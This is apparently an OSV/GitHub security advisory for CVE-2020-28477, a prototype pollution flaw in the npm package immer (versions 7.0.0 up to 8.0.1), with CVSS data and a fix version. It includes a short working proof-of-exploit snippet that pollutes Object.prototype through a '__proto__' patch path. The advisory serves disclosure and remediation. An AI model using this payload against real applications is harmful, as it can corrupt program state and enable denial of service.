GHSA-9qmh-276g-x5pj

Suggest an improvement
Source
https://github.com/advisories/GHSA-9qmh-276g-x5pj
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/01/GHSA-9qmh-276g-x5pj/GHSA-9qmh-276g-x5pj.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-9qmh-276g-x5pj
Aliases
  • CVE-2020-28477
  • SNYK-JAVA-ORGWEBJARSNPM-1061986
  • SNYK-JS-IMMER-1019369
Published
2021-01-20T21:27:56Z
Modified
2024-09-03T03:26:50.370816Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
Summary
Prototype Pollution in immer
Details

Overview

Affected versions of immer are vulnerable to Prototype Pollution.

Proof of exploit

const {applyPatches, enablePatches} = require("immer");
enablePatches();
let obj = {};
console.log("Before : " + obj.polluted);
applyPatches({}, [ { op: 'add', path: [ "__proto__", "polluted" ], value: "yes" } ]);
// applyPatches({}, [ { op: 'replace', path: [ "__proto__", "polluted" ], value: "yes" } ]);
console.log("After : " + obj.polluted);

Remediation

Version 8.0.1 contains a fix for this vulnerability, updating is recommended.

Database specific
{
    "nvd_published_at": "2021-01-19T11:15:00Z",
    "cwe_ids": [
        "CWE-471"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2021-01-20T19:37:58Z"
}
References

Affected packages

npm / immer

Package

Affected ranges

Type
SEMVER
Events
Introduced
7.0.0
Fixed
8.0.1